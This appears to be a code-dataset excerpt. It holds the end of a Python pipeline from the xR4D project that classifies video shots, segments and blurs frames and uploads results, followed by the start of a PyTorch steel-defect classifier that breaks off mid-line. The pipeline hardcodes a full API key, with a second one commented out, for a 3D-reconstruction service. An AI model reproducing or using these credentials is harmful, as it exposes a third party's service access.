= time.time()\n subprocess.run(\"python TransNetV2-master/inference/transnetv2.py \" + save_filename)\n\n # # predictors.shot_detection(save_filename)\n # # K.clear_session() # TODO!!!\n #\n # Save shot detection info in lists to use it\n start_frame = []\n end_frame = []\n\n # Read txt with shot info\n shot_filename = save_filename+\".scenes.txt\"\n shot_file = open(shot_filename, \"r\")\n shots_num = 0\n for line in shot_file:\n start_frame.append(line.split()[0])\n end_frame.append(line.split()[-1])\n shots_num = shots_num + 1\n print(\"[INFO] Shot boundary detection finished!\")\n logging.info(\"Shot boundary detection finished!\")\n t2 = time.time()\n print(t2 - t1, \" sec\")\n logging.info(t2 - t1, \" sec\")\n\n # ------------- Scene Recognition (for every shot) --------------#\n # & #\n # ------------- Emergency Detection (for every shot) ------------#\n\n # Using keyframes to get a result that characterizes the whole video shot\n # ToDo: Extract keyframes per video shot and analyze only them!!!\n\n # Create the needed dictionaries to save extracted info # TODO: add json output for geoserver! 
+ ProjectID?\n\n # For KB - Information only per video shot\n KB_JSON = {}\n KB_JSON[\"header\"] = {\"timestamp\": str(datetime.now(tz=None)), \"sender\": \"Visual Analysis\", \"entity\": entity, \"simmoid\": simmoid, \"project_id\": project_id} #ToDo\n KB_JSON[\"shotInfo\"] = []\n\n # For 3D Rec - Information per video shot for SR + all processed frames\n Rec_JSON = {}\n Rec_JSON[\"header\"] = {\"timestamp\": str(datetime.now(tz=None)), \"sender\": \"Visual Analysis\", \"entity\": entity,\n \"simmoid\": simmoid, \"project_id\": project_id} # ToDo test with project_id too!!\n Rec_JSON[\"shotInfo\"] = []\n\n # Information to keep in my MongoDB (VisualsOutput collection) - Full analysis info (per shot for SR, per frame BOL)\n full_JSON = {}\n full_JSON[\"header\"] = {\"timestamp\": str(datetime.now(tz=None)), \"entity\": entity, \"simmoid\": simmoid}\n full_JSON[\"shotInfo\"] = []\n\n video_info_dict = {}\n video_info_dict[\"simmoid\"] = simmoid\n\n print(\"[INFO] ----> Analysing video, please wait...\")\n logging.info(\"----> Analysing video, please wait...\")\n\n # load model for SR\n SR_model = load_model('Trained_models/SR/xr4drama_places_model_ep5_bs32.h5')\n print(\"[INFO] SR model is successfully loaded!\")\n logging.info(\"SR model is successfully loaded!\")\n\n # load model for EmC\n EmC_model = load_model('Trained_models/EmC/vgg16_places2_lastconv_19ep_1e-03lr_MME2017.pkl')\n print(\"[INFO] EmC model is successfully loaded!\")\n logging.info(\"EmC model is successfully loaded!\")\n\n if pst:\n # load model for PST\n # train_tfrec = \"PST/tfrecords/train.tfrec\"\n # val_tfrec = \"PST/tfrecords/val.tfrec\"\n\n model = WCT2(image_size=None, lr=1e-4, gram_loss_weight=1.0)\n model.wct.load_weights(model.checkpoint_path)\n # model.train(train_tfrec, epochs=10, batch_size=8)\n\n model.wct.save_weights(model.checkpoint_path)\n\n print(\"[INFO] PST model is successfully loaded!\")\n logging.info(\"PST model is successfully loaded!\")\n\n # load model for BOL\n semantic_segmentation_model = semantic_segmentation()\n semantic_segmentation_model.load_ade20k_model(\"Trained_models/BOL/Pixellib/deeplabv3_xception65_ade20k.h5\")\n print(\"[INFO] BOL model is successfully loaded!\")\n logging.info(\"BOL model is successfully loaded!\")\n\n for shot_idx in range(0, shots_num):\n\n # # Create a separate folder for the processed frames of each video shot\n # if not os.path.exists(proc_frames_path + \"shot\" + str(shot_idx)):\n # os.makedirs(proc_frames_path + \"shot\" + str(shot_idx))\n\n # Save extracted info (per video shot) - for KB\n shot_info_dict_KB = {}\n shot_info_dict_KB[\"shotIdx\"] = shot_idx\n shot_info_dict_KB[\"startFrame\"] = start_frame[shot_idx]\n shot_info_dict_KB[\"endFrame\"] = end_frame[shot_idx]\n # shot_info_dict_KB[\"area\"] = []\n # shot_info_dict_KB[\"areaProb\"] = []\n # shot_info_dict_KB[\"outdoor\"] = []\n # shot_info_dict_KB[\"emergencyType\"] = []\n # shot_info_dict_KB[\"emergencyProb\"] = []\n # shot_info_dict_KB[\"objectsFound\"] = [{\"type\": \"building\", \"probability\": 0.67}, {\"type\": \"traffic light\", \"probability\": 0.44}] # TODO: add actual objects\n shot_info_dict_KB[\"objectsFound\"] = []\n shot_info_dict_KB[\"peopleInDanger\"] = 0\n shot_info_dict_KB[\"vehiclesInDanger\"] = 0\n shot_info_dict_KB[\"riverOvertop\"] = False\n\n # Save extracted info (per video shot) - for 3D Rec\n shot_info_dict_3D_rec = {}\n shot_info_dict_3D_rec[\"shotIdx\"] = shot_idx\n shot_info_dict_3D_rec[\"startFrame\"] = start_frame[shot_idx]\n shot_info_dict_3D_rec[\"endFrame\"] = 
end_frame[shot_idx]\n shot_info_dict_3D_rec[\"frameInfo\"] = []\n\n frame_info_dict_3D_rec = {}\n # frame_info_dict_3D_rec[\"frameNum\"] = 0\n # frame_info_dict_3D_rec[\"procFrameUrl\"] = \"\"\n\n # For the output to 3d reconstruction\n blur_classes = [\"person\", \"car\", \"bus\", \"truck\", \"minibike\", \"bicycle\", \"van\", \"animal\"]\n remove_classes = [\"sky\", \"sea\", \"signboard\"]\n # keep_classes = [\"wall\", \"building\", \"road\", \"sidewalk\", \"house\", \"column\", \"skyscraper\", \"path\", \"stairs\", \\\n # \"stairway\", \"bridge\", \"tower\", \"fountain\", \"sculpture\"]\n #\n # keep_classes_2 = [\"wall\", \"building\", \"floor\", \"road\", \"grass\", \"sidewalk\", \"earth\", \"door\", \"mountain\", \\\n # \"house\", \"field\", \"fence\", \"river\", \"rock\", \"column\", \"skyscraper\", \"path\", \"stairs\", \\\n # \"stairway\", \"bridge\", \"hill\", \"bench\", \"tower\", \"land\", \"escalator\", \"fountain\", \"swimming\", \\\n # \"sculpture\"]\n\n print(\"\\n\\n[INFO] ----> Analyzing shot \", shot_idx)\n logging.info(\"----> Analyzing shot \", shot_idx)\n n = 4 # get SR result per n frames\n frames = []\n scenes = []\n sr_probs = []\n are_outdoor = []\n emergencies = []\n emc_probs = []\n frame_counter = 0 # how many frames were analysed\n frames_for_rec_num = 0 # how many frames were automatically selected to be sent to 3D reconstruction service\n for frame_idx in range(int(start_frame[shot_idx])+5, int(end_frame[shot_idx])-5, n): # +5 frames from the start frame of the video shot to avoid shot transition artifacts\n\n # Add frame number for the output to 3d reconstruction\n frame_info_dict_3D_rec[\"frameNum\"] = frame_idx\n # frame_info_dict_3D_rec[\"procFrameUrl\"] = \"\"\n\n frames.append(frame_idx)\n # print(\"Number of frame analyzed: \", frame_idx)\n # Get frame\n frame = cv2.imread(frames_path + \"frame_\" + str(frame_idx) + \".jpg\")\n\n # Run SR model\n scene, sr_prob, is_outdoor = predictors.SR_model(frame, SR_model)\n scenes.append(scene)\n sr_probs.append(sr_prob)\n are_outdoor.append(is_outdoor)\n print(\"Scene: {}, Probability: {}\".format(scene, sr_prob))\n logging.info(\"Scene: {}, Probability: {}\".format(scene, sr_prob))\n\n # Run EmC model\n emergency, emc_prob = predictors.EmC_model(frame, EmC_model)\n emergencies.append(emergency)\n emc_probs.append(emc_prob)\n\n # Check if we will use PST or not\n if pst:\n os.makedirs(pst_frame_path, exist_ok=True)\n # rst = None\n rst = 64 * 12 # (896)\n # test_id = np.random.randint(1, 60)\n # test_id = 20\n\n # start = datetime.datetime.now()\n # content = get_local_img(\"./examples/input/tar55.png\".format(test_id), rst)\n content = get_local_img(frames_path + \"frame_\" + str(frame_idx) + \".jpg\", rst)\n style = get_local_img(\"PST/examples/style/tar44.png\", rst)\n\n output = model.transfer(tf.cast(content, tf.float32), tf.cast(style, tf.float32), 0.8)\n\n plt.imsave(pst_frame_path + \"frame_\" + str(frame_idx) + \".jpg\", output[0] / 255.0)\n\n # Run BOL model\n segvalues, objects_masks, image_overlay = semantic_segmentation_model.segmentAsAde20k(\n pst_frame_path + \"frame_\" + str(frame_idx) + \".jpg\", overlay=False, extract_segmented_objects=True,\n output_image_name=masks_path + \"frame_\" + str(frame_idx) + \"_mask.png\")\n\n else:\n\n # Run BOL model\n segvalues, objects_masks, image_overlay = semantic_segmentation_model.segmentAsAde20k(frames_path + \"frame_\" + str(frame_idx) + \".jpg\", overlay=False, extract_segmented_objects=True,\n output_image_name=masks_path + \"frame_\" + str(frame_idx) + 
\"_mask.png\")\n\n print(frames_path + \"frame_\" + str(frame_idx) + \".jpg\")\n logging.info(frames_path + \"frame_\" + str(frame_idx) + \".jpg\")\n print(segvalues['class_names'])\n logging.info(segvalues['class_names'])\n print(segvalues['ratios'])\n logging.info(segvalues['ratios'])\n\n # Upload mask to file storage\n url = \"http://xr4drama.iti.gr:5002/fileUpload/masks\"\n # Open the image in read-only format.\n file = {'file': open(masks_path + \"frame_\" + str(frame_idx) + \"_mask.png\", 'rb')}\n uploaded_file_url = WebFunctions.send_post(url, file, False)\n print(\"Mask url: \", uploaded_file_url)\n logging.info(\"Mask url: \", uploaded_file_url)\n\n building_class = False\n building_ratio = 0\n wall_class = False\n wall_ratio = 0\n\n if len(shot_info_dict_KB['objectsFound']) > 0:\n for o in range(0, len(segvalues['class_names'])):\n found = 0 # flag to see if label was saved so that we have it once for the shot\n for dict_idx in range(len(shot_info_dict_KB['objectsFound'])):\n my_dict = shot_info_dict_KB['objectsFound'][dict_idx]\n\n if segvalues['class_names'][o] == my_dict['type']:\n found = 1\n # check if the current probability is greater than the saved one\n if my_dict['probability'] < segvalues['ratios'][o]:\n shot_info_dict_KB['objectsFound'][dict_idx][\"probability\"] = segvalues['ratios'][o]\n\n if found == 0 and segvalues['class_names'][o] in predictors.wanted_ade20k_labels and segvalues['ratios'][o] > 1: # 1/100 = 0.01 threshold of ratio to take into account the class\n objects_dict = {}\n objects_dict['type'] = segvalues['class_names'][o]\n objects_dict['probability'] = segvalues['ratios'][o] / 100\n # objects_info.append(objects_dict)\n shot_info_dict_KB['objectsFound'].append(objects_dict)\n\n # Check if there is \"building\" or \"wall\" and get their ratios\n if segvalues['class_names'][o] == \"building\":\n building_class = True\n building_ratio = segvalues['ratios'][o] #0-100\n elif segvalues['class_names'][o] == \"wall\":\n wall_class = True\n wall_ratio = segvalues['ratios'][o] #0-100\n\n else:\n for o in range(0, len(segvalues['class_names'])):\n if segvalues['class_names'][o] in predictors.wanted_ade20k_labels and segvalues['ratios'][o] > 1:\n objects_dict = {}\n objects_dict['type'] = segvalues['class_names'][o]\n objects_dict['probability'] = segvalues['ratios'][o] / 100\n shot_info_dict_KB['objectsFound'].append(objects_dict)\n\n # Check if there is \"building\" or \"wall\" and get their ratios\n if segvalues['class_names'][o] == \"building\":\n building_class = True\n building_ratio = segvalues['ratios'][o] # 0-100\n elif segvalues['class_names'][o] == \"wall\":\n wall_class = True\n wall_ratio = segvalues['ratios'][o] # 0-100\n\n frame_counter = frame_counter + 1\n\n # Check if we should extract output for the 3D reconstruction service\n if is_outdoor and sr_prob >= 9.5 and scene != \"bar\" and scene != \"restaurant\" and \\\n ((building_class and building_ratio >= 8) or (wall_class and wall_ratio >= 8)):\n\n # Blurriness check\n frame_resized = imutils.resize(frame, width=500)\n gray_frame = cv2.cvtColor(frame_resized, cv2.COLOR_BGR2GRAY)\n\n # apply our blur detector using the FFT\n (mean, blurry) = detect_blur_fft(gray_frame, size=60,\n thresh=blur_avg-2)\n\n print(\"---> Detecting bluriness - Mean: \", mean)\n logging.info(\"---> Detecting bluriness - Mean: \", mean)\n\n if blurry:\n print(\"^^^^^Blurry frame detected!^^^^^\")\n logging.info(\"^^^^^Blurry frame detected!^^^^^\")\n else:\n # Current frame was selected to be sent to 3D reconstruction 
service\n frames_for_rec_num = frames_for_rec_num + 1\n\n # Create output image for 3D reconstruction\n h, w, n = frame.shape\n\n blur_mask = np.zeros(shape=(h, w), dtype=np.uint8)\n remove_mask = np.zeros(shape=(h, w), dtype=np.uint8)\n\n for i in range(0, len(objects_masks)):\n print(objects_masks[i]['class_name'])\n logging.info(objects_masks[i]['class_name'])\n\n if objects_masks[i]['class_name'] in remove_classes:\n\n mask = objects_masks[i]['masks']\n mask = mask.astype(np.uint8)\n mask[mask == 1] = 255\n\n new_mask = cv2.resize(mask, (w, h), interpolation=cv2.INTER_LINEAR)\n\n # Add this mask to remove_mask\n remove_mask = remove_mask + new_mask\n\n # if there is a great coverage of \"building\", remove \"mountain\"\n elif objects_masks[i]['class_name'] == \"mountain\" and building_ratio >= 50:\n\n mask = objects_masks[i]['masks']\n mask = mask.astype(np.uint8)\n mask[mask == 1] = 255\n\n new_mask = cv2.resize(mask, (w, h), interpolation=cv2.INTER_LINEAR)\n\n # Add this mask to remove_mask\n remove_mask = remove_mask + new_mask\n\n if objects_masks[i]['class_name'] in blur_classes:\n mask = objects_masks[i]['masks']\n mask = mask.astype(np.uint8)\n mask[mask == 1] = 255\n\n new_mask = cv2.resize(mask, (w, h), interpolation=cv2.INTER_LINEAR)\n\n # Add this mask to blur_mask\n blur_mask = blur_mask + new_mask\n\n # Blur specific objects\n img = frame.copy()\n blur_img = cv2.blur(frame, (21, 21), 0)\n blur_mask_3d = cv2.merge((blur_mask, blur_mask, blur_mask))\n out = np.where(blur_mask_3d, blur_img, img)\n\n # Keep only the foreground in image\n inv_remove_mask = cv2.bitwise_not(remove_mask)\n\n # Remove noise from mask with dilation and erosion\n # Taking a matrix of size 5 as the kernel\n kernel = np.ones((5, 5), np.uint8)\n\n # The first parameter is the original image,\n # kernel is the matrix with which image is\n # convolved and third parameter is the number\n # of iterations, which will determine how much\n # you want to erode/dilate a given image.\n inv_remove_mask_eros = cv2.erode(inv_remove_mask, kernel, iterations=10)\n inv_remove_mask_denoised = cv2.dilate(inv_remove_mask_eros, kernel, iterations=10)\n\n # for r in range(0, 5):\n # kernel = np.ones((7, 7), np.uint8) # TODO: Best kernel size?\n # inv_remove_mask_denoised = cv2.morphologyEx(inv_remove_mask, cv2.MORPH_OPEN, kernel)\n\n # Combine blurring & masking\n out2 = cv2.bitwise_and(out, out, mask=inv_remove_mask_denoised)\n\n # Create a separate folder for the processed frames of each video shot\n os.makedirs(proc_frames_path + \"shot\" + str(shot_idx), exist_ok=True)\n\n cv2.imwrite(proc_frames_path + \"shot\" + str(shot_idx) + \"/frame_\" + str(frame_idx) + \"_processed.jpg\", out2)\n\n # Upload processed frame to file storage\n url = \"http://xr4drama.iti.gr:5002/fileUpload/processed_images\"\n # Open the image in read-only format.\n file = {'file': open(proc_frames_path + \"shot\" + str(shot_idx) + \"/frame_\" + str(frame_idx) + \"_processed.jpg\", 'rb')}\n uploaded_file_url = WebFunctions.send_post(url, file, False)\n print(\"Processed frame url: \", uploaded_file_url)\n logging.info(\"Processed frame url: \", uploaded_file_url)\n frame_info_dict_3D_rec[\"procFrameUrl\"] = uploaded_file_url\n\n # Add extracted information for this frame to the 3D Rec dictionary\n shot_info_dict_3D_rec[\"frameInfo\"].append(frame_info_dict_3D_rec.copy())\n\n # Dominant Scene - Majority voting\n c = Counter(scenes)\n dominant_scene = c.most_common(1) # finds most common scene detected in the frames of the analyzed shot\n\n if 
len(dominant_scene) == 0:\n dominant_scene.append(('none', 0))\n\n shot_info_dict_KB[\"area\"] = dominant_scene[0][0]\n # shot_info_dict_Rec[\"area\"] = dominant_scene[0][0]\n # shot_json[\"shots_info\"][shot_idx][\"outdoor\"] = True\n # shot_json[\"shots_info\"][shot_idx][\"scene_recognized\"] = dominant_scene[0][0]\n print(\"[INFO] Scene Recognized in shot {} : {} - ({}/{})\".format(shot_idx, dominant_scene[0][0], dominant_scene[0][1], frame_counter))\n logging.info(\"Scene Recognized in shot {} : {} - ({}/{})\".format(shot_idx, dominant_scene[0][0], dominant_scene[0][1], frame_counter))\n\n # Avg probability of Dominant Scene\n # print(dominant_scene[0][0])\n indices = [i for i, s in enumerate(scenes) if dominant_scene[0][0] in s]\n # print(indices)\n sum_sr_probs = 0\n for idx in indices:\n sum_sr_probs = sum_sr_probs + float(sr_probs[idx])\n\n if dominant_scene[0][1] == 0:\n avg_sr_prob = 0\n else:\n avg_sr_prob = sum_sr_probs / dominant_scene[0][1]\n shot_info_dict_KB[\"areaProb\"] = avg_sr_prob/100\n # shot_info_dict_Rec[\"areaProb\"] = avg_sr_prob / 100\n print(\"----- Avg SR Probability: {}%\".format(avg_sr_prob))\n logging.info(\"----- Avg SR Probability: {}%\".format(avg_sr_prob))\n # shot_json[\"shots_info\"][shot_idx][\"scene_prob\"] = avg_sr_prob\n\n # Characterize analyzed scene as \"outdoors\" or \"indoors\"\n c = Counter(are_outdoor)\n outdoor_instances = c.most_common(1)\n\n if len(outdoor_instances) == 0:\n outdoor_instances.append(('none', 0))\n\n outdoor = outdoor_instances[0][0]\n shot_info_dict_KB[\"outdoor\"] = outdoor\n # shot_info_dict_Rec[\"outdoor\"] = outdoor\n if outdoor:\n print(\"----- Scene is characterized as Outdoor.\")\n logging.info(\"----- Scene is characterized as Outdoor.\")\n else:\n print(\"----- Scene is characterized as Indoor.\")\n logging.info(\"----- Scene is characterized as Indoor.\")\n\n # Dominant emergency situation and avg probability ToDo: It now outputs dummy results!! 
Add beAware model for EmC\n        c = Counter(emergencies)\n        dominant_emergency = c.most_common(1)\n\n        if len(dominant_emergency) == 0:\n            dominant_emergency.append(('none', 0))\n\n        shot_info_dict_KB["emergencyType"] = dominant_emergency[0][0]\n        print("[INFO] Emergency type in shot: ", dominant_emergency[0][0])\n        logging.info("Emergency type in shot: %s", dominant_emergency[0][0])\n\n        # Avg probability of Dominant Emergency Type\n        indices = [i for i, s in enumerate(emergencies) if dominant_emergency[0][0] in s]\n        # print(indices)\n        sum_emc_probs = 0\n        for idx in indices:\n            sum_emc_probs = sum_emc_probs + float(emc_probs[idx])\n\n        if dominant_emergency[0][1] == 0:\n            avg_emc_prob = 0\n        else:\n            avg_emc_prob = sum_emc_probs / dominant_emergency[0][1]\n        shot_info_dict_KB["emergencyProb"] = avg_emc_prob\n        # shot_json["shots_info"][shot_idx]["emergency_type"] = dominant_emergency[0][0]\n        # shot_json["shots_info"][shot_idx]["emergency_prob"] = avg_emc_prob\n        print('----- Avg Emergency Probability: {}%'.format(avg_emc_prob))\n        logging.info('----- Avg Emergency Probability: {}%'.format(avg_emc_prob))\n\n        # Finalise the output JSON for KB\n        # print(shot_info_dict_KB)\n        #\n        KB_JSON["shotInfo"].append(shot_info_dict_KB)\n\n        print(KB_JSON["shotInfo"][shot_idx])\n        logging.info(KB_JSON["shotInfo"][shot_idx])\n\n        if frames_for_rec_num >= 5:\n            # Update output JSON for 3D Reconstruction\n            Rec_JSON["shotInfo"].append(shot_info_dict_3D_rec)\n\n            print(Rec_JSON["shotInfo"][-1])\n            logging.info(Rec_JSON["shotInfo"][-1])\n\n    # Save KB_JSON file\n    with open(video_path + entity + '_' + simmoid + "_" + 'KB.json', 'w') as f:\n        json.dump(KB_JSON, f)\n\n    # Save output for KB (maybe this will be inside the analysis function)\n    db.ImagesDB.VisualsOutputKB.insert_one(KB_JSON)\n    # db.XR4D_Visual_Analysis_DB.VisualsOutputKB.insert_one(KB_JSON)\n\n    if sendtoKB:\n        print("\n[INFO] Sending output to KB...")\n        logging.info("\nSending output to KB...")\n\n        # /population/VISUAL_ANALYSIS\n\n    # Save Rec_JSON file\n    with open(video_path + entity + '_' + simmoid + "_" + "Rec.json", 'w') as f:\n        json.dump(Rec_JSON, f)\n\n    # Save output for KB (maybe this will be inside the analysis function)\n    db.ImagesDB.VisualsOutput3D.insert_one(Rec_JSON)\n    # db.XR4D_Visual_Analysis_DB.VisualsOutput3D.insert_one(Rec_JSON)\n\n    if sendtoRec:\n        print("\n[INFO] Sending output to 3D Reconstruction...")\n        logging.info("\nSending output to 3D Reconstruction...")\n\n        # Send Rec_JSON to the 3D Reconstruction service\n        base_url = "https://baremetal.up2metric.com/"\n\n        rec_file = open(video_path + entity + '_' + simmoid + "_" + "Rec.json", "r")\n        payload = json.load(rec_file)\n\n        headers = {\n            'api_key': '2gLTq6KTBFCevaXlQ7lEva-pylNfSqy6MUQpr1n26BGDOqut8K7en4IuxV6S2r7KJ9SuWOyvD7oihBy7pqZKAA',\n            # 'oCxNWXZYI5ksEno0Bb8Nf_Os4vgaqf0R07MwElmbKR-xiKpZLAphlcLJW76IYKYITYn_cLTiE5xGYeeIocd4Fw',\n            'Content-Type': 'application/json'\n        }\n\n        response = requests.post(base_url + "jobs/json", headers=headers, json=payload)\n        print(response.text)\n        logging.info(response.text)\n        print(response.status_code)\n        logging.info(response.status_code)\n\n    #### ====== Create Log File ====== ####\n    # Get date and time that current analysis ends\n    moment = str(datetime.now(tz=None))\n\n    # Get current log data\n    with open("logfilename.log", "r") as f:\n        logs = f.read()\n\n    # Create current log dictionary\n    new_log_data = {}\n    new_log_data["moment"] = moment\n    new_log_data["message"] = logs\n\n    # Get all logs until now\n\n
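The dominant-scene block earlier and the dominant-emergency block above repeat the same Counter-based shape: take the most common label, then average the probabilities of the frames that voted for it. A small helper captures that pattern; this is an illustrative refactoring sketch with placeholder names, not code from the original file:

```python
from collections import Counter

def dominant_with_avg_prob(labels, probs):
    """Return (most common label, its count, average prob over its frames)."""
    if not labels:
        return 'none', 0, 0.0
    label, count = Counter(labels).most_common(1)[0]
    matched = [float(p) for lab, p in zip(labels, probs) if lab == label]
    return label, count, sum(matched) / count

# Three of four frames voted "flood"; the average is taken over those three.
print(dominant_with_avg_prob(['flood', 'flood', 'fire', 'flood'],
                             [0.9, 0.8, 0.6, 0.7]))
```

    # Check if log 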
file exists\n file_exists = exists(\"full_log_file.json\")\n if not file_exists:\n open(\"full_log_file.json\", \"w\")\n\n # Check if log file is empty\n if os.stat(\"full_log_file.json\").st_size == 0:\n print('Log File is empty')\n\n full_log_list = []\n full_log_list.append(new_log_data)\n\n with open(\"full_log_file.json\", \"w\") as file:\n json.dump(full_log_list, file)\n\n else:\n print('Log File is not empty')\n\n with open(\"full_log_file.json\", \"r\") as file_read:\n past_log_data = json.load(file_read)\n\n past_log_data.append(new_log_data)\n\n with open(\"full_log_file.json\", \"w\") as file_write:\n json.dump(past_log_data, file_write)\n\n\n\n\n","repo_name":"DoraPist/xR4D_Visual_Analysis","sub_path":"visual_analysis_functions_v1.py","file_name":"visual_analysis_functions_v1.py","file_ext":"py","file_size_in_byte":46053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"468484239","text":"import numpy as np\nimport pandas as pd\nimport cv2\nfrom torchvision import models\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.sampler import SubsetRandomSampler\nimport os\nimport re\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\nimport itertools\nimport torch\nfrom tqdm import tqdm\nfrom albumentations.pytorch.transforms import ToTensor\nfrom albumentations import (\n PadIfNeeded,\n HorizontalFlip,\n VerticalFlip,\n CenterCrop,\n Crop,\n Compose,\n Transpose,\n RandomRotate90,\n ElasticTransform,\n GridDistortion,\n OpticalDistortion,\n RandomSizedCrop,\n OneOf,\n CLAHE,\n RandomBrightnessContrast,\n RandomGamma,\n Normalize\n)\nfrom torch.nn import functional as F\nBatchNorm2d = nn.BatchNorm2d\n\n###############################################################################\nclass ConvBn2d(nn.Module):\n\n def __init__(self, in_channel, out_channel, kernel_size=3, padding=1, stride=1):\n super(ConvBn2d, self).__init__()\n self.conv = nn.Conv2d(in_channel, out_channel, kernel_size=kernel_size, padding=padding, stride=stride, bias=False)\n self.bn = nn.BatchNorm2d(out_channel, eps=1e-5)\n\n def forward(self,x):\n x = self.conv(x)\n x = self.bn(x)\n return x\n\n\n\n\n############# resnext50 pyramid feature net #######################################\n# https://github.com/Hsuxu/ResNeXt/blob/master/models.py\n# https://github.com/D-X-Y/ResNeXt-DenseNet/blob/master/models/resnext.py\n# https://github.com/miraclewkf/ResNeXt-PyTorch/blob/master/resnext.py\n\n\n# bottleneck type C\nclass BasicBlock(nn.Module):\n def __init__(self, in_channel, channel, out_channel, stride=1, is_shortcut=False):\n super(BasicBlock, self).__init__()\n self.is_shortcut = is_shortcut\n\n self.conv_bn1 = ConvBn2d(in_channel, channel, kernel_size=3, padding=1, stride=stride)\n self.conv_bn2 = ConvBn2d( channel,out_channel, kernel_size=3, padding=1, stride=1)\n\n if is_shortcut:\n self.shortcut = ConvBn2d(in_channel, out_channel, kernel_size=1, padding=0, stride=stride)\n\n\n def forward(self, x):\n z = F.relu(self.conv_bn1(x),inplace=True)\n z = self.conv_bn2(z)\n\n if self.is_shortcut:\n x = self.shortcut(x)\n\n z += x\n z = F.relu(z,inplace=True)\n return z\n\n\n\n\nclass ResNet34(nn.Module):\n\n def __init__(self, num_class=1000 ):\n super(ResNet34, self).__init__()\n\n\n self.block0 = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=7, padding=3, stride=2, bias=False),\n BatchNorm2d(64),\n nn.ReLU(inplace=True),\n )\n self.block1 = nn.Sequential(\n nn.MaxPool2d(kernel_size=3, padding=1, 
stride=2),\n BasicBlock( 64, 64, 64, stride=1, is_shortcut=False,),\n * [BasicBlock( 64, 64, 64, stride=1, is_shortcut=False,) for i in range(1,3)],\n )\n self.block2 = nn.Sequential(\n BasicBlock( 64,128,128, stride=2, is_shortcut=True, ),\n * [BasicBlock(128,128,128, stride=1, is_shortcut=False,) for i in range(1,4)],\n )\n self.block3 = nn.Sequential(\n BasicBlock(128,256,256, stride=2, is_shortcut=True, ),\n * [BasicBlock(256,256,256, stride=1, is_shortcut=False,) for i in range(1,6)],\n )\n self.block4 = nn.Sequential(\n BasicBlock(256,512,512, stride=2, is_shortcut=True, ),\n * [BasicBlock(512,512,512, stride=1, is_shortcut=False,) for i in range(1,3)],\n )\n self.logit = nn.Linear(512,num_class)\n\n\n\n def forward(self, x):\n batch_size = len(x)\n\n x = self.block0(x)\n x = self.block1(x)\n x = self.block2(x)\n x = self.block3(x)\n x = self.block4(x)\n x = F.adaptive_avg_pool2d(x,1).reshape(batch_size,-1)\n logit = self.logit(x)\n return logit\n\nclass Resnet34_classification(nn.Module):\n def __init__(self,num_class=4):\n super(Resnet34_classification, self).__init__()\n e = ResNet34()\n self.block = nn.ModuleList([\n e.block0,\n e.block1,\n e.block2,\n e.block3,\n e.block4,\n ])\n e = None #dropped\n self.feature = nn.Conv2d(512,32, kernel_size=1) #dummy conv for dim reduction\n self.logit = nn.Conv2d(32,num_class, kernel_size=1)\n\n def forward(self, x):\n batch_size,C,H,W = x.shape\n\n for i in range( len(self.block)):\n x = self.block[i](x)\n #print(i, x.shape)\n\n x = F.dropout(x,0.5,training=self.training)\n x = F.adaptive_avg_pool2d(x, 1)\n x = self.feature(x)\n logit = self.logit(x)\n return logit\n\n\nclass SteelDataset(Dataset):\n def __init__(self):\n self.root = 'input/severstal-steel-defect-detection/'\n\n def get_df():\n train_df = pd.read_csv('input/severstal-steel-defect-detection/train.csv')\n labels = []\n for i in range(len(train_df)):\n if type(train_df.EncodedPixels[i]) == str:\n labels.append(1)\n else:\n labels.append(0)\n labels = np.array(labels)\n labels = labels.reshape((int(len(train_df) / 4), 4))\n\n images_df = pd.DataFrame(train_df.iloc[::4, :].ImageId_ClassId.str[:-2].reset_index(drop=True))\n labels_df = pd.DataFrame(labels)\n proc_train_df = pd.concat((images_df, labels_df), 1)\n\n return proc_train_df\n self.train_df = get_df()\n\n def __len__(self):\n return self.train_df.shape[0]\n\n def __getitem__(self, idx):\n file = self.train_df.iloc[idx].values[0]\n file_path = os.path.join((self.root + 'train_images'), file)\n image = cv2.imread(file_path)\n\n mean = (0.485, 0.456, 0.406)\n std = (0.229, 0.224, 0.225)\n train_aug = Compose([\n # PadIfNeeded(min_height=256, min_width=1600, p=1),\n VerticalFlip(p=0.5),\n HorizontalFlip(p=0.5),\n Normalize(mean=mean, std=std, p=1),\n ToTensor()])\n\n augmented = train_aug(image=image)\n image = augmented['image']\n label = torch.tensor(np.array(self.train_df.iloc[idx].values[1:], dtype=np.float32))\n return image, label\n\n\nclass Train_Model(object):\n def __init__(self):\n self.model = None\n self.optimizer = None\n self.scheduler = None\n\n self.train_loader = None\n self.val_loader = None\n self.train_data = None\n self.val_data = None\n\n self.save_path = 'output/weights'\n\n self.num_epochs = 100\n self.batch_size = 16\n self.learning_rate = 0.001\n self.weight_decay = 1e-3\n\n def train(self):\n current_loss, current_acc = 0, 0\n\n self.model.train()\n for image, label in tqdm(self.train_loader, total=len(self.train_loader), ascii=True, desc='train'):\n image = image.cuda()\n label = label.cuda()\n 
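The ResNet-34 assembled block by block earlier in this file follows the standard 3/4/6/3 basic-block layout, and the file already imports `torchvision.models`. When a quick baseline is enough, the same classifier can be obtained directly from torchvision; an illustrative sketch, not part of this repo's training path:

```python
import torch.nn as nn
from torchvision import models

# Standard ResNet-34 backbone with the 1000-way ImageNet head
# replaced by a 4-way head for the four steel-defect classes.
model = models.resnet34(pretrained=True)
model.fc = nn.Linear(model.fc.in_features, 4)
```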
self.optimizer.zero_grad()\n\n with torch.set_grad_enabled(True):\n outputs = self.model(image)\n batch_size, num_class, H, W = outputs.shape\n outputs = outputs.view(batch_size, num_class)\n label = label.view(batch_size, num_class)\n loss = F.binary_cross_entropy_with_logits(outputs, label, reduction='none')\n loss = loss.mean()\n\n loss.backward()\n self.optimizer.step()\n\n # print('gradients =', [x.grad.data for x in model.parameters()])\n # _, predictions = torch.max(outputs, 1)\n # print('weights after backpropagation = ', list(model.parameters()))\n current_loss += loss.item() * image.size(0)\n current_acc += torch.sum(outputs.data == label.data)\n total_loss = current_loss / len(self.train_loader.dataset)\n total_acc = 100 * current_acc.double() / len(self.train_loader.dataset)\n print('TRAIN: Loss: {}, Accuracy: {}%'.format(total_loss, total_acc))\n return total_loss\n\n def validation(self):\n losses, all_predicted, all_labels = [], [], []\n total, correct = 0, 0\n\n self.model.eval()\n for (image, label) in tqdm(self.val_loader, total=len(self.val_loader), ascii=True, desc='validation'):\n image = image.cuda()\n label = 